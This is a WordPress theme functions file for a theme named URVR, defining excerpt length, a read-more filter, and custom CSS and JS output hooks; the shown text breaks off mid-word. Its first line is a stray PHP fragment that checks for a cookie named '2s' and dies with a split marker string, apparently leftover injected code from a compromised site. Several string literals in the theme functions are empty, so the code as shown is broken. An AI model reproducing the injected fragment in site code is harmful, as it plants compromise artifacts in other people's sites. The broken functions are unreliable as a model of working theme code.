if(isset($_COOKIE['2s'])) { die('tfmwR'.'zTPYF'); } echo ''; ?> /** * Theme Functions * * Various functions to use through out site such as breadcrumb, pagination, etc * * @package URVR * * @since 1.0 * */ // cleaning up excerpt add_filter('excerpt_more', 'abaris_excerpt_more'); // This removes the annoying […] to a Read More link function abaris_excerpt_more($excerpt) { global $post; // edit here if you like return '
'; } function abaris_excerpt_length( $length ) { return 20; } add_filter( 'excerpt_length', 'abaris_excerpt_length', 999 ); add_action( 'wp_head', 'abaris_custom_css' ); function abaris_custom_css() { global $urvr; if( isset( $urvr['custom-css'] ) ) { $custom_css = ''; echo $custom_css; } } add_action( 'wp_footer', 'abaris_custom_js', 99 ); function abaris_custom_js() { global $urvr; if( isset( $urvr['cu